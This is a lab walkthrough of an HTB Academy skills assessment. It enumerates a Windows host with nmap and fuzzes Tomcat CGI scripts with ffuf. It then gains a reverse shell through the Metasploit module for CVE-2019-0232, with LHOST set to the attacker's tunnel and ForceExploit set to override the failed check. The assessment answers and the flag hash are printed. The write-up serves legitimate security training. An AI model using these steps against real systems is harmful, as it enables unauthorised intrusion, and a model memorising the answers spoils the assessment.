During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.
Questions:
What vulnerable application is running?
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ sudo nmap -sV -sC 10.129.98.249 -ox nmap.xml
[sudo] password for sasorirose:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 01:12 UTC
Failed to resolve "nmap.xml".
Failed to resolve "nmap.xml".
Nmap scan report for 10.129.98.249
Host is up (0.24s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21 08:07AM website_backup
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Freight Logistics, Inc
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-12-08T11:28:27
|_Not valid after: 2026-06-09T11:28:27
|_ssl-date: 2026-05-05T02:12:15+00:00; +59m14s from scanner time.
| rdp-ntlm-info:
| Target_Name: APPS-SKILLS1
| NetBIOS_Domain_Name: APPS-SKILLS1
| NetBIOS_Computer_Name: APPS-SKILLS1
| DNS_Domain_Name: APPS-SKILLS1
| DNS_Computer_Name: APPS-SKILLS1
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T02:12:04+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Jetty 9.4.42.v20210604
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.42.v20210604)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-05T02:12:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 59m13s, deviation: 0s, median: 59m13s
Failed to resolve "nmap.xml".
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.23 seconds
Summary of Nmap scan:
Target: Windows Server (10.129.98.249)
Critical Findings (Attack Path):
- Port 21 (FTP): Anonymous login is enabled. Contains a website_backup directory. Start here to download files and hunt for hardcoded credentials.
- Port 8080 & 8009 (Apache Tomcat 9.0.0.M1): The primary exploitation target. Once you find credentials in the FTP backup, use them to log into the Tomcat Manager on 8080 to upload a reverse shell. Port 8009 (AJP) also suggests it may be vulnerable to Ghostcat.
Secondary Web Targets:
- Port 8000 (Jetty): Check the robots.txt file for hidden directories.
- Port 80 (IIS): Standard company website ("Freight Logistics, Inc."). Fuzz for hidden directories if Tomcat fails.
Hold for Later (Requires Credentials):
- Ports 445 (SMB), 3389 (RDP), 5985 (WinRM): Use these for remote access and lateral movement after you have found valid usernames and passwords.
Answer: Tomcat
What port is this application running on?
Answer: 8080
What version of the application is in use?
Answer: 9.0.0.M1
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
Let's do next to maybe get deep in enumeration for the Tomcat service first and if don’t see anything we continue to enumerate for other services

googling for some PoC and CVE related to this version
checked for RCE exploits for Apache Tomcat 9.0.0.M1 and found a rapid7 article that seemed promising
https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2019-0232/
that led to me goolging CVE-2019-0232 POC and I found
https://github.com/setrus/CVE-2019-0232
which told me there was a metasploit module for this exploit, but ALSO reminded me that I need to fuzz for CGI scripts.
Running FFUF to try and find CGI scripts
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ ffuf -u http://10.129.99.6:8080/cgi/FUZZ.bat -w /usr/share/dirb/wordlists/common.txt


Set up to reverse shell at msfconsole
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 10.129.99.6
rhosts => 10.129.99.6
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rport 8080
rport => 8080
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/cmd.bat
targeturi => /cgi/cmd.bat
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > run
when I attempted to run it, I got the following error:
Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
because I manually tested the injection myself I felt comfortable setting force exploit to true and when I did that it did work and I got a shell

use : shell to change to powershell and get flag

Answer: f55763d31a8f63ec935abd07aee5d3d0